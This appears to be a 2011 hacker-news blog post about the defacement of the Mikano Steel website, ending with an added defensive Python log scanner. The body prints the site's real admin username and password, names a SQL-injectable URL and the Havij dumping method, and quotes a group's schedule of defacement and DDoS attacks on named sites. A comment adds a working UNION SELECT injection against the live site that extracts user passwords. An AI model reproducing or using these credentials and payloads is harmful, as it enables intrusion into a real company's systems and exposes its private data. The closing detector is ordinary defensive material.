By Commander X
5:45 PM PT June 24, 2011
HackerLeaks has just been notified by an anonymous source that the Mikano Steel web site has been badly hacked. The site is located at:
http://www.mikanosteel.com/
The site was massively defaced, as the screenshots will show. HackerLeaks staff have verified that, 30 minutes after the leak was received, the site is still in the state shown in these photos. The defacement and attack are part of Operation Let There Be Light In Nigeria, a joint Op of Naija Cyber Hactivists, the Peoples Liberation Front and Anonymous. According to our source, members of all three groups participated. According to the source of this disclosure, Operation Let There Be Light In Nigeria is an operation to bring badly needed, affordable electrical energy to the Nigerian people. The site was also defaced with the following message:
" Hacked By The Naija Cyber Hactivists
This site was hacked using a tiger 1 kva generator with 5 littres of fuel ! no be so he suppose be :-(
#LetThereBeLightInNigeria
NaijaCyberHactivists have officially Decided to identify with the Nigerian Million March project facebook.com/event.php?eid=219476691418888 (Let there be light in Nigeria). The official #Hashtag would be #LetThereBeLightInNigeria
Our aim is to identify both from the Cyber Space and the Fields with, collaboration with The PLF and Anonymous
We are standing against Darkness !
We are saying enough is enough !
We are saying Let there be light in Nigeria !
Young and Old ,
Liberal , Progressives and Conservatives
North, South,East and West
Christians and Muslims.
We can not sit at our systems, browsing facebook, tweeting while expecting a revolution.
Every time we decide not to exercise our rights, We contribute to the oppression of the human body
and the repression of the human mind.
You have a choice to make,... walk willingly into your own submission
Or
A choice to get up, walk the walk and say enough is enough -No more darkness in Nigeria!
There is going to be a peaceful action named Nigerian Million March.
The Nigerian Million March, is a PEACEFUL march with NO POLITICAL AGENDA and is NOT POLITICALLY AFFILIATED and not started by NaijaCyberHactivists.
What is the purpose of the peaceful “Nigerian Million March”?
To create a greater awareness that the lack of electricity denies Nigerians of their basic necessities of life such as: Employment, Security, Good Health, Education, Economic Growth and many more.
For more info : http://www.facebook.com/event.php?eid=219476691418888
http://www.nigerianmillionmarch.com/
This is a noble cause for our nation and we have decided to identify with this project.
You will hear more from us -STAY TUNED!
Naijacyberhactivists - In Source Code We Trust, Fighting for a cause.
Our Mission : Hand Over The Whip To The Horse!
http://twitter.com/#!/NaijaCyberHack
Naijacyberhactivists@yahoo.com
We would be using defacement and ddos as a media to make the #LightUpNigeria movement known to the public
The main targets would be http://www.phcnonline.com/ and http://www.mikano-intl.com/
The Op #LetThereBeLightInNigeria would be going live on 24th June 2011 and subsequent attacks will follow suit
as stated below :
#LetThereBeLightInNigeria Attack 1 - June 24th
#LetThereBeLightInNigeria Attack 2 - July 24th
#LetThereBeLightInNigeria Attack 3 - August 24th
#LetThereBeLightInNigeria Attack 4 - September 24th"
According to one of the sources of this leak, the hackers used the following technique to gain entry into the site: "okay i just used a sqli simple injection
used havij to dump it
then asked flip0ut to help me with the admin page
he got it and i entered it
when i got in there was a cms editor i was familiar with
so i just started working on it
i first i use havij to dump this url http://www.mikanosteel.com/product-image. php?picid=6'"
The source for this disclosure also indicated that the database from this site was stolen and is being forwarded to HackerLeaks. This is a breaking release and we will update this post as more info is sent to us.
Admin: 1995m@kano
Password: m@kano2011
To all the sKiddies: Please learn how to inject manually! Havij rocks, but you should also rock! ;)
However, here's my POC for this Page, a more or less (more less than more) nice Formatting for the Password...
@mikanosteel.com: you should be able to get that fixed soon, because another defacing would just be bad for PR...
Here is the POC:
http://www.mikanosteel.com/bigimage.php?prodid=0'UNION ALL SELECT 1,2,3,concat(0x223e3c2f74643e3c2f74723e3c2f7461626c653e3c2f6469763e3c646976207374796c653d22706f736974696f6e3a2066697865643b20746f703a203070783b206c6566743a3070783b2077696474683a2036303070783b206865696768743a31303070783b206261636b67726f756e642d636f6c6f723a20726762283235352c302c3029223e557365723a2020203c623e,username,0x3c2f623e3c62723e50617373776f72643a202020,password,0x3c62723e3c62723e3c62723e50726f6f66204f6620436f6e63657074206279203c623e6330707065723c2f623e3c2f6469763e3c696d67),4,5,6 FROM users WHERE '1'='1
Best Regards from a white hat
c0pper
PS: Sorry for the unreadable HeX code, Blogspot doesn't allow < tD> codes... (stupid, isn't it? :P)
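A defender-side view of the two requests quoted on this page, as an added example that is not part of the original post or its comments: a small access-log scanner that flags the `picid` and `prodid` parameters whenever they carry anything other than a plain integer, and names the injection indicators it sees. The log lines, client addresses and the shortened hex literal are constructed for illustration, and Combined Log Format is an assumption about the server's logging.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the quoted requests inject into; both should carry a numeric ID only.
NUMERIC_PARAMS = {"picid", "prodid"}

# Indicator patterns taken from the shape of the two requests quoted on the page.
INDICATORS = {
    "quote": re.compile(r"['\"]"),
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}", re.I),
    "concat_call": re.compile(r"\bconcat\s*\(", re.I),
}

# Client address and request target from a Combined Log Format line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (client, param, decoded value, indicator names) per bad ID parameter."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    client, target = m.groups()
    findings = []
    # parse_qsl percent-decodes, so %27 and %20 are matched as ' and space.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            hits = [k for k, rx in INDICATORS.items() if rx.search(value)]
            findings.append((client, name, value, hits or ["non_numeric"]))
    return findings

def scan_log(lines):
    """Scan every line and return all findings in log order."""
    return [f for line in lines for f in scan_line(line)]

# Constructed sample log: documentation addresses, shortened hex literal.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jun/2011:17:02:11 -0700] "GET /product-image.php?picid=6 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Jun/2011:17:03:40 -0700] "GET /product-image.php?picid=6%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [24/Jun/2011:17:04:02 -0700] "GET /bigimage.php?prodid=0%27UNION%20ALL%20SELECT'
    '%201,2,concat(0x41424344,username)%20FROM%20users HTTP/1.1" 200 2048',
    '198.51.100.7 - - [24/Jun/2011:17:05:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, name, value, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {name}={value!r} -> {', '.join(hits)}")
```

Flagging is only the detection half; the durable fix on the application side is to bind the ID as an integer parameter in the query instead of concatenating it into the SQL string.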